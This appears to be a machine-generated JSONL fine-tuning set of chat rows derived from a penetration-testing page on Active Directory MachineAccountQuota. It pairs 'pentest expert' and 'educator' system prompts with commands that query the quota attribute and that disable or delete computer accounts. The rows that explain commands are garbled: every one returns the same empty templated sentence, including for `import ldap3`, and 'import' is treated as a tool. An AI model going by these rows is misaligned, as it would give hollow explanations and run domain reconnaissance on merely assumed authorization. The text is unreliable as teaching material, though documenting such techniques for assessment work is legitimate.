value?", "response": "::: tabs\n\n=== UNIX-like\n\nThe MachineAccountQuota module (for NetExec (Python)) can be used to check the value of the MachineAccountQuota attribute:\n\n``bash\nnxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq\n`\n\nAlternatively, it can be done manually with the Python library ldap3 (source):\n\n`bash\nimport ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])\n`\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'\n`\n\nWith ldapsearch (openldap (C)):\n\n`bash\nldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota \n`\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nThe following command, using the PowerShell ActiveDirectory module's cmdlets Get-ADDomain and Get-ADObject, will help testers make sure the controlled domain user can create computer accounts (the MachineAccountQuota domain-level attribute needs to be set higher than 0. It is set to 10 by default).\n\n`powershell\nGet-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'\n`\n\nFuzzSecurity's StandIn project is an alternative in C# (.NET assembly) to perform some AD post-compromise operations.", "metadata": {"corpus_index": 197, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use nxc for machineaccountquota - check the value?"}, {"role": "assistant", "content": "nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use nxc for machineaccountquota - check the value?", "response": "nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq", "metadata": {"corpus_index": 198, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nxc"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Check the value"}, {"role": "assistant", "content": "nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Check the value", "response": "nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq", "metadata": {"corpus_index": 198, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 198, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use import for machineaccountquota - check the value?"}, {"role": "assistant", "content": "import ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use import for machineaccountquota - check the value?", "response": "import ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])", "metadata": {"corpus_index": 199, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MachineAccountQuota - Check the value during a pentest?"}, {"role": "assistant", "content": "import ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MachineAccountQuota - Check the value during a pentest?", "response": "import ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])", "metadata": {"corpus_index": 199, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import ldap3`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import ldap3`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 199, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the bloodyad command for machineaccountquota - check the value"}, {"role": "assistant", "content": "bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the bloodyad command for machineaccountquota - check the value", "response": "bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 200, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "bloodyad"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute MachineAccountQuota - Check the value?"}, {"role": "assistant", "content": "bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute MachineAccountQuota - Check the value?", "response": "bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 200, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `bloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 200, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ldeep command to machineaccountquota - check the value"}, {"role": "assistant", "content": "ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ldeep command to machineaccountquota - check the value", "response": "ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'", "metadata": {"corpus_index": 201, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ldeep"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MachineAccountQuota - Check the value"}, {"role": "assistant", "content": "ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MachineAccountQuota - Check the value", "response": "ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'", "metadata": {"corpus_index": 201, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 201, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ldapsearch syntax for machineaccountquota - check the value?"}, {"role": "assistant", "content": "ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ldapsearch syntax for machineaccountquota - check the value?", "response": "ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 202, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ldapsearch"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute MachineAccountQuota - Check the value?"}, {"role": "assistant", "content": "ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute MachineAccountQuota - Check the value?", "response": "ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 202, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 202, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Get-ADDomain command for machineaccountquota - check the value"}, {"role": "assistant", "content": "Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Get-ADDomain command for machineaccountquota - check the value", "response": "Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'", "metadata": {"corpus_index": 203, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-ADDomain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MachineAccountQuota - Check the value?"}, {"role": "assistant", "content": "Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MachineAccountQuota - Check the value?", "response": "Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'", "metadata": {"corpus_index": 203, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 203, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the StandIn.exe command for machineaccountquota - check the value"}, {"role": "assistant", "content": "StandIn.exe --object ms-DS-MachineAccountQuota=*"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the StandIn.exe command for machineaccountquota - check the value", "response": "StandIn.exe --object ms-DS-MachineAccountQuota=*", "metadata": {"corpus_index": 204, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "StandIn.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Check the value"}, {"role": "assistant", "content": "StandIn.exe --object ms-DS-MachineAccountQuota=*"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Check the value", "response": "StandIn.exe --object ms-DS-MachineAccountQuota=*", "metadata": {"corpus_index": 204, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `StandIn.exe --object ms-DS-MachineAccountQuota=*`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - check the value. Check the value"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `StandIn.exe --object ms-DS-MachineAccountQuota=*`?", "response": "This command is used for machineaccountquota - check the value. Check the value", "metadata": {"corpus_index": 204, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Returns all the objects of class domain in the ADLAB.LOCAL domain, and extracts the MAQ attribute work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties * -LDAPFilter '(objectClass=domain)' |Select-Object distinguishedName,ms-DS-MachineAccountQuota"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Returns all the objects of class domain in the ADLAB.LOCAL domain, and extracts the MAQ attribute work?", "response": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties * -LDAPFilter '(objectClass=domain)' |Select-Object distinguishedName,ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 205, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Returns all the objects of class domain in the ADLAB.LOCAL domain, and extracts the MAQ attribute"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties * -LDAPFilter '(objectClass=domain)' |Select-Object distinguishedName,ms-DS-MachineAccountQuota"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Returns all the objects of class domain in the ADLAB.LOCAL domain, and extracts the MAQ attribute", "response": "Invoke-PassTheCert -Action 'Filter' -LdapConnection $LdapConnection -SearchBase 'DC=ADLAB,DC=LOCAL' -SearchScope Subtree -Properties * -LDAPFilter '(objectClass=domain)' |Select-Object distinguishedName,ms-DS-MachineAccountQuota", "metadata": {"corpus_index": 205, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Disable the account 'CN=COMPUTATOR,CN=Computers,DC=X'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'DisableAccount' -LdapConnection $LdapConnection -Identity 'CN=COMPUTATOR,CN=Computers,DC=X'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Disable the account 'CN=COMPUTATOR,CN=Computers,DC=X'", "response": "Invoke-PassTheCert -Action 'DisableAccount' -LdapConnection $LdapConnection -Identity 'CN=COMPUTATOR,CN=Computers,DC=X'", "metadata": {"corpus_index": 206, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Disable the account 'CN=COMPUTATOR,CN=Computers,DC=X'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'DisableAccount' -LdapConnection $LdapConnection -Identity 'CN=COMPUTATOR,CN=Computers,DC=X'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Disable the account 'CN=COMPUTATOR,CN=Computers,DC=X'", "response": "Invoke-PassTheCert -Action 'DisableAccount' -LdapConnection $LdapConnection -Identity 'CN=COMPUTATOR,CN=Computers,DC=X'", "metadata": {"corpus_index": 206, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Delete the object 'CN=COMPUTATOR,CN=Computers,DC=X'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'DeleteObject' -LdapConnection $LdapConnection -Object 'CN=COMPUTATOR,CN=Computers,DC=X'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Delete the object 'CN=COMPUTATOR,CN=Computers,DC=X'", "response": "Invoke-PassTheCert -Action 'DeleteObject' -LdapConnection $LdapConnection -Object 'CN=COMPUTATOR,CN=Computers,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 207, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Delete the object 'CN=COMPUTATOR,CN=Computers,DC=X'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'DeleteObject' -LdapConnection $LdapConnection -Object 'CN=COMPUTATOR,CN=Computers,DC=X'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has 